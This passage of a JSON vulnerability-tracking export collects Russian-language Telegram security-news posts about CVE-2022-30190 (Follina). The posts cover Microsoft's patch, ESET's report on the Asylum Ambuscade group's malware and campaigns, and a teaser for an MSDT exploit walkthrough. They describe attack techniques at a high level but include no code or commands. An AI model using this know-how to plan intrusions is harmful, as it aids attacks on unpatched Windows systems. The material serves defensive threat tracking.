\u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 Telegram.\n\n#\u0421\u0442\u0438\u043b\u0435\u0440 #\u0425\u0430\u043a\u0435\u0440\u044b #Follina #XFiles\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-07-01T12:58:38.000000Z"}, {"uuid": "28125cf5-cb6f-43b9-9551-ccf6e688d0fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/2680", "content": "\u200b\u26a1\ufe0f\u0425\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Asylum Ambuscade \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u0443\u044e \u043c\u043e\u0442\u0438\u0432\u0430\u0446\u0438\u044e \u0441 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c.\n\n\ud83d\udcac \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Asylum Ambuscade, \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c \u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. 
\u042d\u0442\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 2020 \u0433\u043e\u0434\u0430 \u0438 \u0431\u044b\u043b\u0430 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Proofpoint \u0432 \u043c\u0430\u0440\u0442\u0435 2022 \u0433\u043e\u0434\u0430.\n\n\u041f\u043e \u043d\u043e\u0432\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c ESET, \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Asylum Ambuscade \u0432 \u0441\u0432\u043e\u0438\u0445 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u0439 VBScript-\u043a\u043e\u0434 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190 . 
\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b Sunseed, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0432\u0442\u043e\u0440\u0438\u0447\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c Akhbot \u0441 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 2023 \u0433\u043e\u0434\u0443 Asylum Ambuscade \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b\u0430 \u0441\u0432\u043e\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0430\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0431\u0430\u043d\u043a\u043e\u0432, \u0442\u0440\u0435\u0439\u0434\u0435\u0440\u043e\u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442, \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0431\u0438\u0437\u043d\u0435\u0441\u044b \u0432 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0410\u0437\u0438\u0438.\n\nESET \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u043a\u0442\u043e\u0440\u044b 
\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0440\u0435\u043a\u043b\u0430\u043c\u0443 Google, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u0441\u0430\u0439\u0442\u044b \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c JavaScript-\u043a\u043e\u0434\u043e\u043c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0441 \u043c\u0430\u0440\u0442\u0430 2023 \u0433\u043e\u0434\u0430 \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 Nodebot, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0440\u0442\u043e\u043c Ahkbot \u043d\u0430 Node.js.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u044b, \u0432\u044b\u0442\u0430\u0441\u043a\u0438\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432 Internet Explorer, Firefox \u0438 Chromium, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043f\u043b\u0430\u0433\u0438\u043d\u044b AutoHotkey \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e. 
\u042d\u0442\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u044b \u0438\u043c\u0435\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u0442\u0430\u043a\u0443\u044e \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 Cobalt Strike, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 Chrome \u0434\u043b\u044f hVNC, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u0435\u0439\u043b\u043e\u0433\u0433\u0435\u0440\u0430, \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u0430 Rhadamanthys, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0433\u043e RAT \u0438 \u0434\u0440\u0443\u0433\u043e\u0435.\n\n\u041f\u043e \u043e\u0446\u0435\u043d\u043a\u0430\u043c ESET, Asylum Ambuscade \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0430 \u043e\u043a\u043e\u043b\u043e 4500 \u0436\u0435\u0440\u0442\u0432 \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0433\u043e\u0434\u0430, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 265 \u0436\u0435\u0440\u0442\u0432 \u0432 \u043c\u0435\u0441\u044f\u0446. 
\u042d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\u0426\u0435\u043b\u0438 \u0438 \u043c\u043e\u0442\u0438\u0432\u044b Asylum Ambuscade \u043f\u043e\u043a\u0430 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u044f\u0441\u043d\u044b\u043c\u0438. \u0425\u043e\u0442\u044f \u0445\u0430\u043a\u0435\u0440\u044b \u044f\u0432\u043d\u043e \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b \u0438 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u0435 \u0441\u0447\u0435\u0442\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0431\u044b\u043b\u0438, \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 SMB-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0442\u0430\u043a\u0436\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436.\n\n\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u043e\u0434\u0430\u044e\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0435\u0442\u044f\u043c \u044d\u0442\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0434\u0440\u0443\u0433\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, 
\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0441\u043e\u0444\u0442\u0430, \u043e\u0434\u043d\u0430\u043a\u043e ESET \u043d\u0435 \u043d\u0430\u0448\u043b\u0430 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u044d\u0442\u043e\u0439 \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u044b.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2023-06-10T07:56:00.000000Z"}, {"uuid": "0b46dfd9-20f9-4be2-bf74-98c0fa5dc50a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/6083", "content": "\u200b\ud83e\udda0 Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina\n\nMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Follina. 
\u041e\u0448\u0438\u0431\u043a\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u00abMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u043e\u043b\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u043b\u0438\u0435\u043d\u0442\u0430\u043c, \u0447\u044c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u043a\u0430\u043a \u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e 
\u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u043e\u0432 Microsoft Windows Support Diagnotic Tool (MSDT), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432\u0441\u0451 \u0435\u0449\u0451 \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (Windows 7+, Windows Server 2008+).\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u044d\u0442\u0443 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u044f\u0445, \u043c\u043e\u0433\u0443\u0442 \u0431\u0435\u0437 \u0442\u0440\u0443\u0434\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. 
\u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0434\u0430\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439.\n\n\u041c\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u043e\u0432\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043e\u0442 Microsoft.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #windows", "creation_timestamp": "2022-06-15T20:37:27.000000Z"}, {"uuid": "c1e21988-76a1-499d-9670-5b4c73e347f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/6037", "content": "\u200bCVE-2022-30190. \u0420\u0430\u0437\u0431\u043e\u0440 MSDT \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u041f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e, Codeby! 
\u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c \u043a\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2022-30190 \u0438 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u0438\u0441\u043f\u044b\u0442\u0430\u0435\u043c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. 27 \u043c\u0430\u044f \u043d\u0430 VirusTotal \u043f\u043e\u0441\u0442\u0443\u043f\u0438\u043b \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Office \u0441\u043e \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u043f\u043e\u0437\u043d\u0430\u043d\u0430 \u043a\u0430\u043a 0-day, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u043b\u043e \u0435\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445. \u0420\u0438\u0441\u043a \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0441\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c MSDT URI \u0438 \u0441 \u041e\u0421 Winows. 
\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0442\u0430\u043a-\u0436\u0435 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0443 \u0435\u0449\u0435 \u043b\u0435\u0433\u0447\u0435, \u0432\u0441\u0435 \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 - \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u044e\u0440\u043b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c MSDT URI \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f powershell \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\ud83d\udccc \u0427\u0438\u0442\u0430\u0442\u044c \u0441\u0442\u0430\u0442\u044c\u044e\n\n#cve #rce #windows", "creation_timestamp": "2022-06-08T17:42:42.000000Z"}, {"uuid": "0901c9ec-e50e-4fb8-96c5-051729927a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/HXnB78LZ993EnbGXdL2hofKwYDoKHSeDPKMDrtCNi3QDgzw", "content": "", "creation_timestamp": "2025-08-14T09:00:04.000000Z"}, {"uuid": "fdee8266-f54a-4cdf-8a4d-d5f7ad7af883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/5990", "content": "\u200b\ud83d\udccb Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Microsoft 
Office\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0441\u0432\u043e\u0435\u0433\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430 Microsoft Office. \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u043e\u0434 \u043d\u043e\u043c\u0435\u0440\u043e\u043c CVE-2022-30190.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Microsoft Office \u0441 2016 \u043f\u043e 2021 \u0438 Office 365. \u0412 \u0441\u0435\u0442\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u0440\u0438 